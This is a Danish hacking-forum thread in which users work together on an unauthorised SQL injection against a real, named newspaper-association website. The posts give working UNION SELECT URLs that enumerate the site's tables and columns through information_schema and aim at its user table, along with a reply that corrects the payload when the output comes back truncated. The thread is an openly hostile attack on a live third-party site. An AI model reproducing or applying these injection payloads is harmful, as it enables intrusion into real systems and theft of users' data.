Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Mangler Hjælp Sqli -> dagbladene.dk
20-06-2015, 09:59 (Denne besked var sidst ændret: 20-06-2015, 10:00 af kiksen.)
#1
Mangler Hjælp Sqli -> dagbladene.dk
Hej.
Jeg har ikke oplevet dette før.
Jeg er i gang med at sql injecte denne side: http://www.dagbladene.dk/

Liste over tables:
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--


Hvis jeg spørger efter db_mod_users vil den ikke.
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0x64625f6d6f645f7573657273--

Det sjove det er jeg godt kan få nogle af de andre til at virke, men ikke denne. Nogle der kan hjælpe?
Find alle beskeder fra denne bruger
Citer denne besked i et svar
20-06-2015, 12:55 (Denne besked var sidst ændret: 20-06-2015, 13:13 af BigJ.)
#2
RE: Mangler Hjælp Sqli -> dagbladene.dk
Det ser ud som om at der er et "max" limit på hvor meget du får ud på en gang. Problemet ligger nemlig i, at du aldrig får de sidste par table navne med (og i dette tilfælde den sidste del af tabel navnet). Tabellen hedder nemlig "db_mod_users_data".


EDIT:
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,2,3,4,concat(table_name),5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x646167626c6164656e65--
Find alle beskeder fra denne bruger
Citer denne besked i et svar
21-07-2015, 15:15
#3
RE: Mangler Hjælp Sqli -> dagbladene.dk
Hvordan lykkedes det dig at finde sårbarheden ? Hvis jeg sætter noget ekstra på URL'en kan jeg ikke få en sql fejl, jeg får bare vist et tomt content frame.
Jeg kan godt tage den URL du har skrevet og ændre i den og få svar på mine forespørgsler.

There was an important job to be done and Everybody was sure that Somebody would do it. Anybody could have done it, but Nobody did it. Somebody got angry about that, because it was Everybody's job. Everybody thought Anybody could do it, but Nobody realized that Everybody wouldn't do it.
It ended up that Everybody blamed Somebody when Nobody did what Anybody could have done
Find alle beskeder fra denne bruger
Citer denne besked i et svar
21-07-2015, 17:52
#4
RE: Mangler Hjælp Sqli -> dagbladene.dk
Jeg lurede det godt selv bagefter da jeg stødte på et andet site der gjorde det samme.
Tak for det idkfa

There was an important job to be done and Everybody was sure that Somebody would do it. Anybody could have done it, but Nobody did it. Somebody got angry about that, because it was Everybody's job. Everybody thought Anybody could do it, but Nobody realized that Everybody wouldn't do it.
It ended up that Everybody blamed Somebody when Nobody did what Anybody could have done
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)